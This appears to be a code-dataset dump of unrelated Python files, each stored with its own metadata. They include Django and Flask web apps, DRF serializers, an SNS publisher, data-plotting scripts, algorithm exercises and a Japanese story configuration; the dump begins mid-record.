= 30\n for i in range(len(self.my_chain)):\n chunk = self.my_chain[i]\n this_string = chunk.morph + \"-\"\n if chunk.edge:\n this_string += str(chunk.edge.toState.index) + \"-\"\n returnstring += this_string + \" \" * (columnwidth - len(this_string))\n print >> outfile, returnstring,\n print >> outfile\n\n def Display(self):\n returnstring = \"\"\n for i in range(len(self.my_chain)):\n chunk = self.my_chain[i]\n returnstring += chunk.morph + \"-\"\n if chunk.edge:\n returnstring += str(chunk.edge.toState.index) + \"-\"\n return returnstring\n\n # ----------------------------------------------------------------------------------------------------------------------------#\n","sub_path":"ClassLexicon.py","file_name":"ClassLexicon.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"95837973","text":"class Movie:\n '''\n a class to store movie details fro api\n \n '''\n def __init__(self,id, title, overview, poster, vote_average, vote_count):\n self.id = id\n self.title = title\n self. overview = overview \n self.poster = 'https://image.tmdb.org/t/p/w500/'+ poster\n self.vote_average = vote_average\n self.vote_count = vote_count","sub_path":"app/models/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"20865932","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param two ListNodes\n # @return the intersected ListNode\n def getIntersectionNode(self, headA, headB):\n if not headA or not headB:\n return None\n currentA, currentB = headA, headB\n \n while True:\n if currentA == currentB:\n return currentA\n currentA, currentB = currentA.next, currentB.next\n if currentA == currentB:\n return currentA\n if not currentA:\n currentA = headB\n if not currentB:\n currentB = headA\n","sub_path":"testIntersection.py","file_name":"testIntersection.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"204931748","text":"#enter a number or Enter to finish\n#count, sum, min, max, mean\n\n\nn = []\nsum = 0\nmin = None\nmax = None\n\nwhile True:\n try:\n cin=input(\"enter a number or Enter to finish >>> \")\n if not cin:\n break\n number=int(cin)\n n.append(number)\n sum=sum+number\n if min is None or min>number:\n min=number\n if max is None or max\\d+)/validate_schema/?$',\n DemoValidateViewFromSchema.as_view(),\n name='form_validation_schema'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^preview/(?P\\d+)/', FormPreview.as_view()),\n url(r'^forms/', include('demo.builder.urls', namespace='builder')),\n]\n","sub_path":"demo/demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"147413912","text":"# -*- coding: utf-8 -*-\n\"\"\"Story config.\n\"\"\"\n\n\n################################################################\n#\n# Sample:\n#\n# 1) PERSONS\n# 人物簡易設定\n# 2) CHARAS <- duplicated\n# 2) STAGES\n# 舞台基本設定\n# 3) DAYS\n# 年月日設定\n# 4) TIMES\n# 時間帯基本設定\n# 5) ITEMS\n# 小道具設定\n# 6) WORDS\n# 辞書設定\n#\n################################################################\n\n\nPERSONS = (\n # Tag / 氏,名 / 歳 / 性別 / 職業 / 呼称 / 紹介\n (\"sayumi\", \"沙由美\", \"葉山,沙由美\", 37, \"female\", \"事務職\", \"me:私:hiro:洋貴さん:michi:美知\"),\n (\"hiro\", \"洋貴\", \"大沢,洋貴\", 27, \"male\", \"ライター\", \"me:俺:sayumi:沙由美\", \"故人\"),\n (\"michi\", \"美知\", \"鈴本,美知\", 35, \"female\", \"花屋\", \"me:アタシ\"),\n (\"hase\", \"長谷川\", \"長谷川,直道\", 45, \"male\", \"義足技師\", \"me:僕\"),\n (\"take\", \"竹本\", \"竹本,雄太\", 28, \"male\", \"同僚\", \"me:オレ:hiro:大沢君\"),\n )\n\nCHARAS = (\n )\n\nSTAGES = (\n # Tag / 名前 / 紹介\n (\"Toyama\", \"富山県\", \"彼の地元\"),\n (\"mount1\", \"七乙斗山\", \"彼の地元の山\"),# NOTE: ベースは「八乙女山」\n (\"herhome\", \"沙由美の家\", \"マンション\"),\n (\"restaurant\", \"レストラン\", \"彼から大切な話があると待ち合わせたレストラン\"),\n (\"hospital\", \"病院\", \"彼が運ばれた病院\"),\n (\"leglabo\", \"義足工房\", \"紹介されて通っている義足技師の店\"),\n (\"histown\", \"斗賀野町\"),\n )\n\nDAYS = (\n # Tag / 名前 / 月 / 日 / 年\n (\"notforget\", \"彼を忘れられない\", 10,15, 2019),\n (\"artleg\", \"義足合わせの日\", 10,18, 2019),\n (\"visitsis\", \"妹の来た日\", 11,1, 2019),\n (\"knonwdeath\", \"彼の訃報を受けた日\", 11,10, 2009),\n (\"hisdeathday\", \"彼の命日\", 11,11, 2019),\n )\n\nTIMES = (\n # Tag / 名前 / 時 / 分\n (\"inmorning\", \"午前\", 10,0),\n (\"noon\", \"正午\", 12,0),\n (\"afternoon\", \"午後\", 14,0),\n (\"evening\", \"夕方\", 17,0),\n (\"night\", \"夜\", 20,0),\n )\n\nITEMS = (\n # Tag / 名前 / 紹介\n (\"pencil\", \"ボールペン\", \"彼が愛用していた\"),\n (\"pencase\", \"ペンケース\", \"彼が愛用していた\"),\n )\n\nWORDS = (\n # Tag / 名前 / 紹介\n )\n\n","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"633260329","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndf = pd.read_csv('wdbc.data',\n sep=',',\n header=None)\n\ndf.columns = ['id', 'diagnosis', 'mean radius', 'mean texture', 'mean perimeter', 'mean area',\n 'mean smoothness', 'mean compactness', 'mean concavity',\n 'mean concave points', 'mean symmetry', 'mean fractal dimension',\n 'radius error', 'texture error', 'perimeter error', 'area error',\n 'smoothness error', 'compactness error', 'concavity error',\n 'concave points error', 'symmetry error', 'fractal dimension error',\n 'worst radius', 'worst texture', 'worst perimeter', 'worst area',\n 'worst smoothness', 'worst compactness', 'worst concavity',\n 'worst concave points', 'worst symmetry', 'worst fractal dimension']\n\n\ndf.drop(['id', 'mean radius', 'mean perimeter', 'radius error', 'texture error', 'perimeter error', 'area error',\n 'smoothness error', 'compactness error', 'concavity error',\n 'concave points error', 'symmetry error', 'fractal dimension error',\n 'worst radius', 'worst texture', 'worst perimeter', 'worst area',\n 'worst smoothness', 'worst compactness', 'worst concavity',\n 'worst concave points', 'worst symmetry', 'worst fractal dimension'], axis = 1, inplace=True)\n\ndf_corr = df.corr()\ndf_hi_corr = df_corr[(df_corr > 0.5) & (df_corr < 1)]\n#print(df_hi_corr.to_string())\ndf['encoded_diagnosis'] = df['diagnosis'].map({'B': -1, 'M': 1})\ndf.drop('diagnosis', axis = 1, inplace=True)\n\n# print(df.to_string())\n\n# matplotlib\n\n# Figure 1: Bar\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.bar(np.arange(0, len(df['mean symmetry'])), df['mean symmetry'], color='y', label='mean symmetry')\naxes.set_title('Mean Symmetry')\naxes.set_xlabel('Index')\naxes.set_ylabel('Mean Symmetry')\naxes.legend()\nplt.show()\n\n\n# Figure 2: Histogram\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\naxes.hist(df['mean compactness'], color='b', label='mean symmetry')\naxes.set_title('Mean Compactness')\naxes.set_xlabel('Buckets')\naxes.set_ylabel('Mean Compactness')\naxes.legend()\nplt.show()\nplt.close()\n\n\n# Figure 3: Pie\nfig, axes = plt.subplots(1, 1, figsize=(5, 5))\nlabels = 'Begnin', 'Malignant'\naxes.pie(df['encoded_diagnosis'].value_counts(), labels=labels, autopct='%1.1f%%', shadow=True, startangle=90)\naxes.set_title('Diagnosis')\naxes.legend()\nplt.show()\nplt.close()\n\n\n\n# seaborn\nsns.set()\nsns.set_style('white') # ticks, darkgrid, whitegrid\n\n# Figure 4: Bar\n\nax = sns.barplot('encoded_diagnosis', 'mean area', data=df, estimator=np.mean, hue=df['encoded_diagnosis'])\nax.set(xlabel='Benign / Malignant', ylabel='Mean Area')\nplt.show()\nplt.close()\n\n# Figure 5: Box\nax = sns.boxplot('encoded_diagnosis', 'mean texture', data=df, palette='inferno')\nax.set(xlabel='Benign / Malignant', ylabel='Mean Concave Points')\nplt.show()\nplt.close()\n\n# Figure 6: Pair Plot\nsns.pairplot(df, hue='encoded_diagnosis', diag_kind='hist')\nplt.show()\nplt.close()\n\n\n\n","sub_path":"nov_5_2019/nov_5_2019_homework.py","file_name":"nov_5_2019_homework.py","file_ext":"py","file_size_in_byte":3074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"143317043","text":"# Adapted from http://stackoverflow.com/questions/110803/dirty-fields-in-django\n\nfrom django.db.models.signals import post_save\n\n\nclass DirtyFieldsMixin(object):\n _original_state = None\n\n def __init__(self, *args, **kwargs):\n super(DirtyFieldsMixin, self).__init__(*args, **kwargs)\n self.start_dirty()\n\n def start_dirty(self):\n post_save.connect(\n reset_state, sender=self.__class__,\n dispatch_uid='{name}-DirtyFieldsMixin-sweeper'.format(\n name=self.__class__.__name__))\n reset_state(sender=self.__class__, instance=self)\n\n def _as_dict(self, check_relationship):\n all_field = {}\n\n for field in self._meta.fields:\n if field.rel:\n if not check_relationship:\n continue\n\n field_value = getattr(self, field.attname)\n all_field[field.name] = field.to_python(field_value)\n\n return all_field\n\n# def has_changed(self, field):\n# \"\"\"Returns ``True`` if field has changed from currently saved value\"\"\"\n# return getattr(self, field) != self._original_state[field]\n\n def get_dirty_fields(self, check_relationship=False):\n if not self._original_state:\n return {}\n\n # check_relationship indicates whether we want to check for foreign keys\n # and one-to-one fields or ignore them\n new_state = self._as_dict(check_relationship)\n all_modify_field = {}\n\n for key, value in new_state.items():\n original_value = self._original_state[key]\n if value != original_value:\n all_modify_field[key] = original_value\n\n return all_modify_field\n\n def is_dirty(self, check_relationship=False):\n # in order to be dirty we need to have been saved at least once, so we\n # check for a primary key and we need our dirty fields to not be empty\n if not self.pk or self._original_state is None:\n return True\n return {} != self.get_dirty_fields(check_relationship=check_relationship)\n\n\ndef reset_state(sender, instance, **kwargs):\n # original state should hold all possible dirty fields to avoid\n # getting a `KeyError` when checking if a field is dirty or not\n instance._original_state = instance._as_dict(check_relationship=True)\n\n\nclass LazyDirtyFieldsMixin(DirtyFieldsMixin):\n def __init__(self, *args, **kwargs):\n super(DirtyFieldsMixin, self).__init__(*args, **kwargs)\n","sub_path":"src/dirtyfields/dirtyfields.py","file_name":"dirtyfields.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482605019","text":"from __future__ import absolute_import, print_function, division\n\nimport datetime as dt\nfrom collections import namedtuple\n\nfrom .model import User, Message\n\nplanet_years = {\n 'Mercury': dt.timedelta(days=87.97),\n 'Venus': dt.timedelta(days=224.7),\n 'Earth': dt.timedelta(days=365.26),\n 'Mars': dt.timedelta(days=686.98),\n 'Jupiter': dt.timedelta(days=4332.71),\n 'Saturn': dt.timedelta(days=10759.5),\n 'Uranus': dt.timedelta(days=30685),\n 'Neptune': dt.timedelta(days=60190),\n}\n\nBirthdayEvent = namedtuple('BirthdayEvent', ['name', 'date', 'reason'])\n\ndef suffix(n):\n return str(n)+(\"th\" if 4<=n%100<=20 else {1:\"st\",2:\"nd\",3:\"rd\"}.get(n%10, \"th\"))\n\ndef round_nearest_up(num, nearest):\n num += nearest - num % nearest\n return num\n\ndef find_next(birthday):\n diff = dt.date.today() - birthday\n next_1000 = round_nearest_up(diff.days, 1000)\n return (birthday + dt.timedelta(days=next_1000)), next_1000\n\ndef calculate_birthday_events(birthday_events, name, birthday):\n today = dt.date.today()\n\n # Actual Birthday\n next_birthday = birthday.replace(year=today.year)\n if next_birthday < today:\n next_birthday = next_birthday.replace(year=today.year + 1)\n\n age = next_birthday.year - birthday.year\n\n birthday_events.append(\n BirthdayEvent(\n name=name,\n date=next_birthday,\n reason='{} birthday.'.format(suffix(age))))\n\n # n000th day birthday\n date, which_1000 = find_next(birthday)\n birthday_events.append(\n BirthdayEvent(\n name=name,\n date=date,\n reason='{}th day alive.'.format(which_1000)))\n\n # Birthdays on other planets\n age = today - birthday\n for planet, planet_year in planet_years.items():\n if planet == 'Earth':\n continue\n\n next_planet_age = int(age.total_seconds() / planet_year.total_seconds()) + 1\n next_birthday = next_planet_age * planet_year + birthday\n\n birthday_events.append(\n BirthdayEvent(\n name=name,\n date=next_birthday,\n reason='{} birthday on {}.'.format(suffix(next_planet_age), planet)))\n\n\ndef get_birthdays_message(session, chat_id):\n\n q = (\n session.query(User.full_name, User.id, User.birthday)\n .select_from(Message)\n .filter_by(chat_id=chat_id)\n .join(Message.from_)\n .filter(User.birthday.isnot(None))\n .distinct(User.id)\n )\n birthday_events = []\n\n for row in q:\n calculate_birthday_events(birthday_events, row.full_name, row.birthday)\n\n message = ''\n\n cutoff = dt.date.today() + dt.timedelta(days=60)\n\n lastdate = None\n\n birthday_events.sort(key=lambda x: x.date)\n for event in birthday_events:\n if event.date > cutoff:\n break\n\n if event.date == lastdate:\n message += '{}, {}\\n'.format(event.name, event.reason)\n else:\n lastdate = event.date\n if lastdate is not None:\n message += '\\n'\n message += '*{}*\\n'.format(event.date)\n message += '{}, {}\\n'.format(event.name, event.reason)\n\n return message\n","sub_path":"telegrambots/birthdays.py","file_name":"birthdays.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42880551","text":"def MinMax(temperaturas):\n print(\"A menor temperatura do mês foi: {} C.\".format(mínima(temperaturas)))\n print(\"A maior temperatura do mês foi: {} C.\".format(máxima(temperaturas)))\n\n\ndef mínima(temperaturas):\n min = temperaturas[0]\n for temp in temperaturas:\n if min > temp:\n min = temp\n return min\n\n\ndef máxima(temperaturas):\n max = temperaturas[0]\n for temp in temperaturas:\n if max < temp:\n max = temp\n return max\n\n##############################################################\n# TESTES TESTES TESTES TESTES TESTES #\n##############################################################\ndef teste(temps, min, max):\n info = '\\033[34m'\n clear = '\\033[m'\n\n sucesso = \"\\033[32m\" + \"Sucesso\" + clear\n erro = \"\\033[31m\" + \"Erro\" + clear\n\n print(info + \"\\nTemperaturas para teste:\" + clear)\n print(\"\\033[33m {} \\033[m\".format(temps))\n\n print(info + \"Teste mínima:\" + clear)\n min_obt = mínima(temps)\n print(\"valor esperado: {} valor obtido {} --» {}\".format(min,\n min_obt, sucesso if min == min_obt else erro))\n print(info + \"Teste máxima:\" + clear)\n max_obt = máxima(temps)\n print(\"valor esperado: {} valor obtido {} --» {}\".format(max,\n max_obt, sucesso if max == max_obt else erro))\n\n\ndef lista_de_testes():\n title = '\\033[7m'\n clear = '\\033[m'\n print(title + \"Iniciar testes\" + clear)\n temp = [0]\n teste(temp, 0, 0)\n\n temp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n teste(temp, 0, 0)\n\n temp = [30, 31, 35, 25, 26, 27, 34, 35, 29,\n 27, 28, 29, 24, 23, 22, 25, 26, 27, 28, 30]\n teste(temp, 22, 35)\n\n temp = [30, 31, 35, -2, 26, 27, -4, 35, 29, -\n 7, 28, 29, 24, 23, 22, 25, -6, 27, -8, 30]\n teste(temp, -8, 35)\n\n print(title + \"Teste finalizado\" + clear)\n\n\nlista_de_testes()\n","sub_path":"Coursera/Introdução à Ciencia da Computação com Python Parte 1/Semana 09/MinMax.py","file_name":"MinMax.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"500633577","text":"from rest_framework import serializers\nfrom .models import Profile\nfrom django.contrib.auth import get_user_model\n\n# from utils import create_email_update_token\n\n\nUser = get_user_model()\n\n\n# Send Basic Profile Data\nclass UserNameSerializer(serializers.ModelSerializer):\n \"\"\"\n We only want to send username for basic profile data along with other profile attributes\n \"\"\"\n\n class Meta:\n model = User\n fields = [\"username\"]\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n\n user = UserNameSerializer()\n\n class Meta:\n model = Profile\n fields = [\n \"profile_pic\",\n \"first_name\",\n \"last_name\",\n \"user\",\n \"bio\",\n \"number_of_followers\",\n \"number_of_followings\",\n ]\n\n # We are not sending id of the profile or user to prevent reverse mapping of user ID's to usernames\n # As user ID's are sent in JWT\n\n def update(self, instance, validated_data):\n \"\"\"\n Only non dangerous fields are updated here, as dangerous fields like user, email require their own validation\n \"\"\"\n\n instance.first_name = validated_data[\"first_name\"]\n instance.last_name = validated_data[\"last_name\"]\n instance.bio = validated_data[\"bio\"]\n instance.save()\n return instance\n\n\nclass ProfileDisplaySerializer(serializers.ModelSerializer):\n class Meta:\n model = Profile\n fields = [\n \"user__username\",\n \"profile_pic\",\n \"first_name\",\n \"last_name\",\n \"number_of_followers\",\n \"number_of_followings\",\n \"bio\",\n ]\n\n\n# Update Profile picture - Profile picture is handled separately\nclass ProfilePicUpdateSerializer(serializers.ModelSerializer):\n \"\"\"\n Separate endpoint for updating profile picture because submitting profile picture\n in a form along with other fields is not a good UX\n \"\"\"\n\n class Meta:\n model = Profile\n fields = [\"profile_pic\"]\n\n def update(self, instance, validated_data):\n print(f\"instance = {instance} \\n validated data = {validated_data} \")\n instance.profile_pic = validated_data[\"profile_pic\"]\n instance.save()\n return instance\n\n\nclass UsernameUpdateSerializer(serializers.ModelSerializer):\n \"\"\"\n An endpoint to update username. Since it requires it's own validation.\n it can be placed in non-dangerous fields with validation. But if there is any error in\n username other fields also won't be saved which is not a good UX\n \"\"\"\n\n class Meta:\n model = User\n fields = [\"username\"]\n\n def validate_username(self, username):\n if (\n (username and User.objects.filter(username=username))\n .exclude(is_active=False)\n .exists()\n ):\n raise serializers.ValidationError(\"Username already taken\")\n return username\n\n def update(self, instance, validated_data):\n \"\"\"\n Updates the username\n \"\"\"\n\n instance.username = validated_data[\"username\"]\n instance.save()\n return instance\n\n\n# Sends all confidential data llke email, can be only accessed by profile owner\nclass UserDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = [\"username\", \"email\"]\n\n\nclass ProfileDetailSerializer(serializers.ModelSerializer):\n\n user = UserDetailSerializer()\n\n class Meta:\n model = Profile\n fields = [\n \"profile_pic\",\n \"first_name\",\n \"last_name\",\n \"user\",\n \"bio\",\n \"number_of_followers\",\n \"number_of_followings\",\n ]\n","sub_path":"UserProfile/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358446029","text":"import os\nimport logging\nfrom sit.utils.aws.sns_service import SNSService\n\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_AWS_REGION = os.environ.get('AWS_DEFAULT_REGION', 'eu-west-1')\n\n\nclass Publisher(object):\n def __init__(self, region=DEFAULT_AWS_REGION):\n self.region = region\n\n if self.region is None:\n raise Exception(\"Publisher - Error - region missing\")\n\n def publish(self, topic_arn, message, **kwargs):\n published_message_id = None\n logger.info('Publisher - publish - topic_arn: %s', topic_arn)\n if topic_arn and message and kwargs:\n event = {'Message': message, 'Args': kwargs}\n sns_publisher = SNSService(topic_arn, self.region)\n response = sns_publisher.publish_event(event)\n if response and isinstance(response, dict):\n published_message_id = response.get('MessageId')\n else:\n logger.info('Publisher - publish - Failure - Bad Params - topic_arn: %s', topic_arn)\n return published_message_id\n","sub_path":"sit/utils/pubsub/publishers/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"556796904","text":"from .forms import HoursEntryForm\nfrom .models import Volunteer, LoggedHours\nfrom .reports import AllVolunteersReport\nfrom flask import Blueprint, current_app, request, render_template, flash, session, redirect, url_for, g\nfrom modules.account.decorators import require_login, require_role, roles\nfrom modules.states.models import StatePosition\n\nvolunteer = Blueprint(\"volunteer\", __name__, template_folder=\"templates\", url_prefix=\"/volunteer\")\n\n@volunteer.route(\"/you/\")\n@require_login\ndef you():\n directorships = [i.state.code for i in StatePosition.select().where(StatePosition.account == g.user, StatePosition.role == 99)]\n return render_template(\"volunteer/profile.html\", volunteer=g.user.volunteer, fake=False, directorships=directorships)\n\n@volunteer.route(\"/all/\")\n@require_role(roles.hours_approver)\ndef all_volunteers():\n report = AllVolunteersReport()\n return render_template(\"volunteer/volunteers.html\", report=report)\n\n@volunteer.route(\"/hours/\")\n@require_login\ndef your_hours():\n hours = g.user.volunteer.hours.order_by(LoggedHours.date.desc())\n return render_template(\"volunteer/your_hours.html\", hours=hours)\n\n@volunteer.route(\"/hours/log/\", methods=[\"GET\", \"POST\"])\n@require_login\ndef log_hours():\n form = HoursEntryForm(request.form)\n\n if not form.validate_on_submit():\n return render_template(\"volunteer/log_hours.html\", form=form)\n\n LoggedHours.create(volunteer=g.user.volunteer, date=form.date.data,\n description=form.description.data, category=form.category.data,\n hours=form.hours.data, modifier=g.user)\n\n flash(\"Your hours have been entered and should be approved shortly.\", \"info\")\n return redirect(url_for(\"volunteer.your_hours\"))\n\n@volunteer.route(\"/hours/edit//\", methods=[\"GET\", \"POST\"])\n@require_login\ndef edit_hours(id):\n form = HoursEntryForm(request.form)\n obj = LoggedHours.get(id=id)\n\n if not form.validate_on_submit():\n form = HoursEntryForm(obj=obj)\n return render_template(\"volunteer/log_hours.html\", form=form, editing=True)\n\n form.populate_obj(obj)\n obj.approved = 0\n obj.modifier = g.user\n obj.save()\n\n return redirect(url_for(\"volunteer.your_hours\"))\n\n@volunteer.route(\"/hours/all/\")\n@require_role(roles.hours_approver)\ndef all_hours():\n return render_template(\"volunteer/all_hours.html\", hours=LoggedHours.select().order_by(LoggedHours.date.desc()))\n\n@volunteer.route(\"/hours/approve/\", methods=[\"GET\", \"POST\"])\n@require_role(roles.hours_approver)\ndef approve_hours():\n if request.method == \"GET\":\n unapproved_hours = LoggedHours.select().where(LoggedHours.approved == 0).order_by(LoggedHours.date.desc())\n return render_template(\"volunteer/unapproved_hours.html\", hours=unapproved_hours)\n else:\n hours = [int(k[5:]) for k in request.form.keys() if k.startswith(\"state\")]\n approved = 0\n denied = 0\n for id in hours:\n result = int(request.form[\"state{}\".format(id)])\n # 0 -> do nothing, 1 -> approve, -1 -> reject\n if result == 0:\n continue\n elif result == 1:\n approved += 1\n elif result == -1:\n denied += 1\n else:\n raise Exception(\"Tried to set an hour's approved state to an invalid value -- this should never happen\")\n\n entry = LoggedHours.get(LoggedHours.id == id)\n entry.approved = result\n entry.modifier = g.user\n entry.save()\n\n unapproved_hours = LoggedHours.select().where(LoggedHours.approved == 0).order_by(LoggedHours.date.desc())\n flash(\"{} entries modified ({} approved, {} rejected).\".format(approved + denied, approved, denied), \"info\")\n return render_template(\"volunteer/unapproved_hours.html\", hours=unapproved_hours)\n\n@volunteer.route(\"/hours/rejected/\", methods=[\"GET\", \"POST\"])\n@require_role(roles.hours_approver)\ndef rejected_hours():\n if request.method == \"GET\":\n rejected_hours = LoggedHours.select().where(LoggedHours.approved == -1).order_by(LoggedHours.date.desc())\n return render_template(\"volunteer/rejected_hours.html\", hours=rejected_hours)\n else:\n hours = [int(k[5:]) for k in request.form.keys() if k.startswith(\"state\")]\n unrejected = False\n deleted = 0\n unrejected = 0\n for id in hours:\n result = int(request.form[\"state{}\".format(id)])\n # 0 -> do nothing, 1 -> unreject, -1 -> delete forever\n\n entry = LoggedHours.get(LoggedHours.id == id)\n\n if result == 0:\n continue\n elif result == -1:\n entry.delete_instance()\n deleted += 1\n elif result == 1:\n entry.approved = 0\n entry.modifier = g.user\n entry.save()\n unrejected += 1\n else:\n raise Exception(\"Tried to perform an undefined action on a rejected hours entry -- this should never happen\")\n\n rejected_hours = LoggedHours.select().where(LoggedHours.approved == -1).order_by(LoggedHours.date.desc())\n flash(\"{} entries modified ({} unrejected, {} deleted forever).\".format(unrejected + deleted, unrejected, deleted), \"info\")\n return render_template(\"volunteer/rejected_hours.html\", hours=rejected_hours)\n","sub_path":"site/modules/volunteer/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":5374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"203734063","text":"from app.mac import mac, signals\n\n'''\nSignals this module listents to:\n1. When a message is received (signals.command_received)\n==========================================================\n'''\n@signals.message_received.connect\ndef handle(message):\n print(message)\n mac.send_message(\"recibido\", message.conversation)\n","sub_path":"modules/api/whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"508579417","text":"def superEggDrop(K: int, N: int) -> int:\n\n # dp状态定义\n # dp[k][m] = n\n # 有k个鸡蛋,最多扔m次,可以解出n层楼的问题\n dp = [[0 for _ in range(N+1)] for _ in range(K+1)]\n\n m = 0\n\n while dp[K][m] < N:\n m += 1\n for k in range(1, K + 1):\n dp[k][m] = dp[k][m-1] + dp[k-1][m-1] + 1\n\n return m\n\n\nprint(superEggDrop(2,6))\n\n\n\n\n\n\n\n\n# Advanced DP\n# class Solution:\n# def superEggDrop(self, K: int, N: int) -> int:\n# memo = {}\n#\n# def dp(K, N) -> int:\n# if K == 1:\n# return N\n# if N == 0:\n# return 0\n#\n# if (K, N) in memo:\n# return memo[(K, N)]\n#\n# res = float('inf')\n# low, high = 1, N\n# while low <= high:\n# mid = (low + high) // 2\n# broke = dp(K - 1, mid - 1)\n# not_broke = dp(K, N - mid)\n# if broke > not_broke:\n# high = mid - 1\n# res = min(res, broke + 1)\n# else:\n# low = mid - 1\n# res = min(res, not_broke + 1)\n#\n# memo[(K, N)] = res\n# return memo[(K, N)]\n#\n# return dp(K, N)\n#\n#\n# demo = Solution()\n# print(demo.superEggDrop(4, 2000))\n# print(demo.memo)\n\n\n\n# 暴力dp\n# class Solution:\n# def __init__(self):\n# self.memo = dict()\n#\n# def superEggDrop(self, K: int, N: int) -> int:\n# def dp(K, N) -> int:\n# if K == 1: return N\n# if N == 0: return 0\n#\n# if (K, N) in self.memo:\n# return self.memo[(K, N)]\n#\n# res = float('INF')\n#\n# for i in range(1, N + 1):\n# res = min(res, max(dp(K - 1, i - 1), dp(K, N - i)) + 1)\n#\n# self.memo[(K, N)] = res\n# return self.memo[(K, N)]\n#\n# return dp(K, N)\n\n","sub_path":"leetcode/887.py","file_name":"887.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"101107856","text":"from flask import Flask, request, jsonify, make_response ,send_file\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_bcrypt import Bcrypt\r\nfrom helper import bcrypt,db\r\nfrom flask_marshmallow import Marshmallow\r\nfrom flask_cors import CORS\r\nfrom functools import wraps\r\nfrom helper import create_app\r\nfrom ml import PredictDisease\r\nfrom flask_login import current_user\r\nimport jwt\r\nimport json\r\nimport datetime\r\nimport os\r\nimport uuid\r\nimport base64\r\nimport re\r\nfrom cost import HealthExpenditure \r\n\r\napp=create_app()\r\n\r\ndef token_required(func):\r\n def wrapper(*args,**kwargs):\r\n\r\n token = request.headers['x-auth-token']\r\n\r\n if not token:\r\n return jsonify({'message':'Token is missing'})\r\n \r\n try:\r\n data = jwt.decode(token,app.config['SECRET_KEY'])\r\n request.data = data\r\n except:\r\n return jsonify({'message':'invalid token'})\r\n return func(*args,**kwargs)\r\n wrapper.__name__ = func.__name__\r\n return wrapper\r\n\r\n\r\n\r\nfrom models import User,Post\r\n\r\n#auth decorator to act as middleware\r\n\r\n@app.route(\"/\",methods=[\"GET\"])\r\ndef getpost():\r\n return jsonify({'message':\"something\"})\r\n\r\n@app.route(\"/register\",methods=[\"POST\"]) \r\ndef register():\r\n #if request.method=='GET':\r\n #return jsonify({'message':\"Get request made\"})\r\n req = request.json\r\n if(req.get('username') and req.get('email') and req.get('password')):\r\n # print(req['email'])\r\n \r\n user = User.query.filter_by(email= req['email']).first()\r\n\r\n if(user):\r\n return jsonify({'message':'2'})\r\n\r\n password = bcrypt.generate_password_hash(req['password']).decode('utf-8')\r\n user1 = User(username=req['username'],email=req['email'],password=password,)\r\n db.session.add(user1)\r\n db.session.commit()\r\n token = jwt.encode({'id':user1.id,'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=180)},app.config['SECRET_KEY']) \r\n # print(\"token:\"+token.decode('UTF-8'))\r\n if token:\r\n resp = {\r\n 'token': token.decode('UTF-8'),\r\n 'user' : {\r\n 'username':user1.username,\r\n 'email': user1.email,\r\n 'id' : user1.id\r\n }\r\n } \r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'3'})\r\n else:\r\n return jsonify({'message': '1'})\r\n \r\n\r\n@app.route(\"/login\",methods=[\"POST\"])\r\ndef login():\r\n req = request.json\r\n if(req.get('email') and req.get('password')):\r\n user = User.query.filter_by(email= req['email']).first()\r\n if(user):\r\n if(bcrypt.check_password_hash(user.password,req['password'])):\r\n #things to do after checking the email and password\r\n token = jwt.encode({'id':user.id,'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=180)},app.config['SECRET_KEY']) \r\n # print(\"token:\"+token.decode('UTF-8'))\r\n if token:\r\n resp = {\r\n 'token': token.decode('UTF-8'),\r\n 'user' : {\r\n 'username':user.username,\r\n 'email': user.email,\r\n 'id' : user.id\r\n }\r\n } \r\n return jsonify(resp)\r\n else:\r\n return jsonify({'message':'3'})\r\n else:\r\n return 